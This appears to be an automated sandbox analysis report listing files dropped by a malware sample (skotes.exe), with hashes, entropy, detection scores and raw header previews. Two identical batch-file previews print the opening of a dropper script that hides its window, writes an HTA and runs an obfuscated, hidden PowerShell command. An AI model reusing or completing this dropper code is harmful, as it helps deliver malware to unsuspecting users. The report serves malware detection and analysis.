                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1867776
                                                                                                                                                                                                                                                    Entropy (8bit):7.947273900269305
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:kQnNyLAbzstcL5o5Kf5lvmFcomUMSTiHP8TEAUH:kGIKsY5osf5cFTM2ivNN
                                                                                                                                                                                                                                                    MD5:FB92C370E7874CF246D292C2C6B36153
                                                                                                                                                                                                                                                    SHA1:24941C27AC2C9A6A227BA5C4D2E3EDB6864CBEAD
                                                                                                                                                                                                                                                    SHA-256:4B8097A621F5BCD06CE04E4370EA51339CFD282DD8265A9F825FA3ED619D1951
                                                                                                                                                                                                                                                    SHA-512:85CC7F786A0E0BD3A671EB35B2ABE06414F6707696213D512B29D03845CE05A20CE3E5628E8119C9FFEE06CD7FB76FF74E55824CE1F8E1EED2A5E6FE752E3C19
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I...........@.................................Y@..m....0.......................A...................................................................................... . . .......`..................@....rsrc........0.......p..............@....idata .....@.......r..............@... .p*..P.......t..............@...sxcdrnzu....../......v..............@...zjhisqmh......I......Z..............@....taggant.0....I.."...^..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1863680
                                                                                                                                                                                                                                                    Entropy (8bit):7.949142262177312
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:gRIAhjQItBKmb5Owb96N2rGibzxc3mL0:81Q4B/Rddc2L
                                                                                                                                                                                                                                                    MD5:ED67D9C1767292DA69180DB0D5B7E57F
                                                                                                                                                                                                                                                    SHA1:3C6BC67972D2237F59DE3DB6D08E5F1A8D6ADA11
                                                                                                                                                                                                                                                    SHA-256:00E76F1C02024D46C81A2E9D85BDFDAD9B4819BD86AD227B28AD4498A0D8894A
                                                                                                                                                                                                                                                    SHA-512:5498DA32D2E4EA25FE1AB7D539CF6C61A5FCB92B1375221E784EA3567F89088C9A411C775C91421D294FA17B82CD1EF33153EC22896E93340DC39005803EE4C6
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I.....h.....@.................................Y@..m....0.......................A...................................................................................... . . .......`..................@....rsrc........0.......p..............@....idata .....@.......t..............@... .`*..P.......v..............@...yxdjfvbh....../......x..............@...qblkshbo......I......J..............@....taggant.0....I.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5206016
                                                                                                                                                                                                                                                    Entropy (8bit):5.564218011157211
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:/5dL6ZDdy3R5it8PYXdjmJU7VVZr4JIMappEGc:/bgDdy3REt8PYXdyJqVVZEJIzH
                                                                                                                                                                                                                                                    MD5:3F6AB8A7E543EE65455B7D923402EF58
                                                                                                                                                                                                                                                    SHA1:192AA1F86EEB4B39E057A49FB9A2EE7AF94D1669
                                                                                                                                                                                                                                                    SHA-256:07C9218CCBA3CEE93DEDDB69C6AFCCD55AE878B07594BB00343D9C3331EB95D7
                                                                                                                                                                                                                                                    SHA-512:4B8E3B19CD5D238959B19E8AD4618C6FE113058A059281CDA238E20E544DEFA93DC11EAAE5829937E6BD6E4DF19EC97EAF22DFB9AEEA3955986E26A7381040D0
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........O...........@...........................O.......O...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...losjkhko..*...$...*...$.............@...ybfttvsi.....pO......JO.............@....taggant.0....O.."...NO.............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):970240
                                                                                                                                                                                                                                                    Entropy (8bit):6.702569330753143
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8adIP3IFp:eTvC/MTQYxsWR7adSI
                                                                                                                                                                                                                                                    MD5:C34E7E019F5FBA5A6CC436D30D6F4AB6
                                                                                                                                                                                                                                                    SHA1:57201B21A26DDA8C669D28183755E419CFBEBFD9
                                                                                                                                                                                                                                                    SHA-256:0DCFDA443E614863A5721C4C6D91A8D722C8C309FDA0500EBEFF7A1C55CAFCB8
                                                                                                                                                                                                                                                    SHA-512:84756FC56C44BFC91D6319AFCAE94C87A2ADD44B20DA68C171FA9F8845CDBF79B3A38EA6BEF8FE1720A365A03875C59EA73F352532695B6BB93AB8C96EA4458E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....sg..........".................w.............@..........................0............@...@.......@.....................d...|....@...b.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....b...@...d..................@..@.reloc...u.......v...X..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2830336
                                                                                                                                                                                                                                                    Entropy (8bit):6.521597081163968
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:WdHKsByBmtI0YOKm5tfumYtgRD7rqa0jL5SSO:yHKsByBmtYJm5tWYRqa0v
                                                                                                                                                                                                                                                    MD5:E3C009D85559B2092B469497794436C5
                                                                                                                                                                                                                                                    SHA1:A08AC17D1AE7A588480EF28792C84476883BEB00
                                                                                                                                                                                                                                                    SHA-256:7C34C45A564A1B1DFFA5ECBF770EF1FE23D64B6B895E137906E176B82D3BBB1C
                                                                                                                                                                                                                                                    SHA-512:0D3627019491DC9A6A4078C1748A2AE36245C6E3EEDB9ED95616F87C590972583C6351BFE694B84BABE062FD61A5AE6A7531780BDF7537E73B01A44FB2268EAF
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+.......+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...kzgpmlwq..*.......*..h..............@...pvwipuxs. ...`+.......+.............@....taggant.@....+.."....+.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027572001\568p2nk.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):612
                                                                                                                                                                                                                                                    Entropy (8bit):4.903167881740855
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:hYNp/qwNFDvNbJw4xxaboR1XKCf0ktEjo+Y/lNQd40UlNRVxWU+oQL:hYNpnjbJwtsvXD05oP/l8tUlj7W7
                                                                                                                                                                                                                                                    MD5:E3EB0A1DF437F3F97A64ACA5952C8EA0
                                                                                                                                                                                                                                                    SHA1:7DD71AFCFB14E105E80B0C0D7FCE370A28A41F0A
                                                                                                                                                                                                                                                    SHA-256:38FFD4972AE513A0C79A8BE4573403EDCD709F0F572105362B08FF50CF6DE521
                                                                                                                                                                                                                                                    SHA-512:43573B0CBAAC6E2E1646E6217D2D10C40AD10B9DB1F4492D6740545E793C891B5E39283A082896C0392B88EB319DFA9392421B1C89C094C9CE9F31B53D37EBAF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head>.<title>Welcome to nginx!</title>.<style>. body {. width: 35em;. margin: 0 auto;. font-family: Tahoma, Verdana, Arial, sans-serif;. }.</style>.</head>.<body>.<h1>Welcome to nginx!</h1>.<p>If you see this page, the nginx web server is successfully installed and.working. Further configuration is required.</p>..<p>For online documentation and support please refer to.<a href="http://nginx.org/">nginx.org</a>.<br/>.Commercial support is available at.<a href="http://nginx.com/">nginx.com</a>.</p>..<p><em>Thank you for using nginx.</em></p>.</body>.</html>.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):14481947
                                                                                                                                                                                                                                                    Entropy (8bit):7.992326276772699
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:393216:ehKRAo/FNXMCHWUj2cuIn/PT1fXMsyVY6ZC6o:ehMNXMb8LX/r107C6o
                                                                                                                                                                                                                                                    MD5:9A3C4CC8695621F95D249B6AE3ABD704
                                                                                                                                                                                                                                                    SHA1:6AD2D319A21D3A414FA5FC2575720957858AE450
                                                                                                                                                                                                                                                    SHA-256:9C476374BB0D6FD0D38B7258A38B449FA6E6D38E119F4A1AD1A55A0B88C1452B
                                                                                                                                                                                                                                                    SHA-512:1A5B443469B5B1463BFECB07C98DF9326DBB87019303ACB1E0318C3CEF59078FDCA5DF86AF0B4CCBA07346DE23F6FE23AA00D6F5218D9E9B36D94414E56617E9
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d.....sg.........."....).....x...... ..........@..........................................`.................................................4...x....p..p....@..8"..............d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...p....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027574001\eO7MwvK.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2013088
                                                                                                                                                                                                                                                    Entropy (8bit):6.068687396136205
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
                                                                                                                                                                                                                                                    MD5:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                                                    SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
                                                                                                                                                                                                                                                    SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
                                                                                                                                                                                                                                                    SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d....}.O..........#............................@.............................0......Bt.......................................................S...........V.............. 3...........................................................................................text...0........................... ..`.rdata...Z.......\..................@..@.data....0...p.......R..............@....pdata...............^..............@..@.rsrc....V.......X...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027575001\e18644e148.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1969152
                                                                                                                                                                                                                                                    Entropy (8bit):7.941708179826234
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:bLF3jkR76hTzKORsnVFBlzfv2LTe4q8iQNxi:bLF3jkR76TzKOWnVFnLvJ47pi
                                                                                                                                                                                                                                                    MD5:BBED182CD53A0E50094340E389D676A0
                                                                                                                                                                                                                                                    SHA1:358D86A1D295D9AFFE8ED75402CFB9F7550710F4
                                                                                                                                                                                                                                                    SHA-256:3B56A181A076D312B9C18DE874DDF4C56AC7CC8C16FBB80383A447E82E678D39
                                                                                                                                                                                                                                                    SHA-512:7167E6090E9AD994366796055A3CB013428690AEB4AF147AFB1B06D472D2C70FEE811694B3EDD5E3473C12F34264E6C34C3842F057F240B7D1210EBCB01F6C30
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....................@..........................0..............................................[.A.o.....@......................................................v...................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... .@*...A.....................@...rpnbigxq. ....k.....................@...yuihiqdq............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027576001\0bf9323d7e.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4444672
                                                                                                                                                                                                                                                    Entropy (8bit):7.9821429531468775
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:98304:LzjLmEIEtVZ3IDyI1OSfYsXfHhQpNSNdx3UZgzIxdP8hyy4i:LzvmEI2fIBOSzXfBQpNS/x3U6IxdPo
                                                                                                                                                                                                                                                    MD5:53DB8912E908083FA5076160A0DB3C31
                                                                                                                                                                                                                                                    SHA1:FF4309A7EC13CF183B4B13D83CDEE8554CC8310E
                                                                                                                                                                                                                                                    SHA-256:8776714B524B22667FCE6F8D4CFAE8BF99061E2A3A4516E48B8335E7B2E65971
                                                                                                                                                                                                                                                    SHA-512:529FCCCB4747DAF4FEF3C3FA0A2E661EF454129E9F3E922EE6BA158F99CAE0534DB7C8AB62A0CE7AF57EDD13A2F83E9BD7FA60E88BFF698BFDB4630F4F679F09
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..K...s..2............K...@...................................D...@... ............................._Pp.s....@p...............s.....0...................................................................................... . .0p.......(.................@....rsrc........@p.......(.............@....idata .....Pp.......(.............@... .`8..`p.......(.............@...habslsfa..............(.............@...xrpgpkiv..............C.............@....taggant.0......."....C.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):513024
                                                                                                                                                                                                                                                    Entropy (8bit):7.65739215558306
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:YH4SldRxAWdkpOQ7CLt9iLS1gYEtAarDRjAMmq:YHxldtkoO2gLeMD9A7q
                                                                                                                                                                                                                                                    MD5:6CF2696DDD277CBFEF6B751CB7F3C65E
                                                                                                                                                                                                                                                    SHA1:850FFCD24EEF0740A111B5AF726C520C5A9780BF
                                                                                                                                                                                                                                                    SHA-256:14BA68337F0E1F65D4D65D23E67AEAF41C86874B67B17BEB5C89E78441B69A1E
                                                                                                                                                                                                                                                    SHA-512:42CC20052068FA95A2D450DEF956F9DDBC3454F6EF45956364AC483D011B72B6A481AD343453B84F87D336879162A56FA8EF6A6642C5F93D652EE6CE894CC351
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....jg.........."......8........................@.......................... ............@.....................................<....0.......................@..D...........................(........_..................l............................text....6.......8.................. ..`.rdata.......P.......>..............@..@.data....&..........................@....tls......... ......................@....rsrc........0......................@..@.reloc..D....@......................@..B.bss.........`......................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1027578001\4c4716526e.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2013088
                                                                                                                                                                                                                                                    Entropy (8bit):6.068687396136205
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
                                                                                                                                                                                                                                                    MD5:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                                                    SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
                                                                                                                                                                                                                                                    SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
                                                                                                                                                                                                                                                    SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d....}.O..........#............................@.............................0......Bt.......................................................S...........V.............. 3...........................................................................................text...0........................... ..`.rdata...Z.......\..................@..@.data....0...p.......R..............@....pdata...............^..............@..@.rsrc....V.......X...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2809
                                                                                                                                                                                                                                                    Entropy (8bit):5.077442886756323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:orouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:o0u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                                                    MD5:7C416B523DCA615B2B1347B6DE083B6B
                                                                                                                                                                                                                                                    SHA1:6DF5A1C2BCA1DE7ACD05CD8B757187E7E4A311FA
                                                                                                                                                                                                                                                    SHA-256:A74F56F1396CD1533BBB1171E8B01F6418CC93D0634AA79399278664BE1924CE
                                                                                                                                                                                                                                                    SHA-512:F4CD5D3DBCB0D048B177C6F33D5D3569C6A18BD1F6E4A58A92D3724ADCB9F8802D9FCD827C5D8F6DFEE78BD3AEA84EA184F62EAB0C94D702E41F14D03BC93235
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2809
                                                                                                                                                                                                                                                    Entropy (8bit):5.077442886756323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:orouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:o0u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                                                    MD5:7C416B523DCA615B2B1347B6DE083B6B
                                                                                                                                                                                                                                                    SHA1:6DF5A1C2BCA1DE7ACD05CD8B757187E7E4A311FA
                                                                                                                                                                                                                                                    SHA-256:A74F56F1396CD1533BBB1171E8B01F6418CC93D0634AA79399278664BE1924CE
                                                                                                                                                                                                                                                    SHA-512:F4CD5D3DBCB0D048B177C6F33D5D3569C6A18BD1F6E4A58A92D3724ADCB9F8802D9FCD827C5D8F6DFEE78BD3AEA84EA184F62EAB0C94D702E41F14D03BC93235
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\EdYEXasNiR.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3220480
                                                                                                                                                                                                                                                    Entropy (8bit):6.6558508778698835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:98304:InuGM5xECMK59cccgccctccOccccccccccYcccFCccccvcccyFcXccckc4cccccq:eM5xELKXcccgccctccOccccccccccYcS
                                                                                                                                                                                                                                                    MD5:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    SHA1:5A1993097306BF2AC08F4BC457DA97C797669989
                                                                                                                                                                                                                                                    SHA-256:7BD2D52A3DBD6ADFC7538319829BD471C1C9140709D8083A80A860EC2DEB93E1
                                                                                                                                                                                                                                                    SHA-512:A064F8E89FDEC590365B19B3265A69F2E764DAC4B3F1197A151F5BE9DC49E07A0AAD8F9ACACA3B2F2ACA7CAF403A744E46FEC84FE62E3D0FF99CE5DBC1D0CC3E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................01...........@..........................`1.....*"2...@.................................W...k...........................(.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...ykgekexw.p*......f*.................@...prmmqeqz..... 1.......0.............@....taggant.0...01.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3220480
                                                                                                                                                                                                                                                    Entropy (8bit):6.6558508778698835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:98304:InuGM5xECMK59cccgccctccOccccccccccYcccFCccccvcccyFcXccckc4cccccq:eM5xELKXcccgccctccOccccccccccYcS
